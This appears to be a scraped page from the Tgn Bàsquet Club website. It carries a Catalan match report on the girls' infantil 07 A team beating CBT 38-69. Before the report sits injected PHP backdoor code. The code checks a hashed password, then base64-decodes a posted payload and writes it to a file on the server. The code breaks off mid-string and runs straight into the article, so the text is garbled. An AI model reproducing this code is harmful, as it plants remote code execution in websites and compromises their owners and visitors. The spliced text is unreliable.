function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení 07 A fa un partit molt complet i guanya clarament el CBT (38-69) - Tgn Bàsquet Club -

L’infantil femení 07 A fa un partit molt complet i guanya clarament el CBT (38-69)

Updated: octubre 8, 2019

L’equip infantil femení 07 A va fer un partit per emmarcar al pavelló del Serrallo i va derrotar el CBT. El conjunt que entrena Manuel Rubio va fonamentar el triomf des de la defensa, que va anul·lar els intents de revifalla de les locals. La defensa a tota la pista del TGN Bàsquet en el segon quart les va permetre obrir una escletxa que va ser decisiva (18-29 al descans). A la represa, les liles van seguir defensant molt bé i, a més, van tancar millor el rebot, un dels aspectes més fluixos en els primers vint minuts. Amb l’encert des del perímetre, les visitants van certificar un gran partit de bàsquet amb una gran victòria.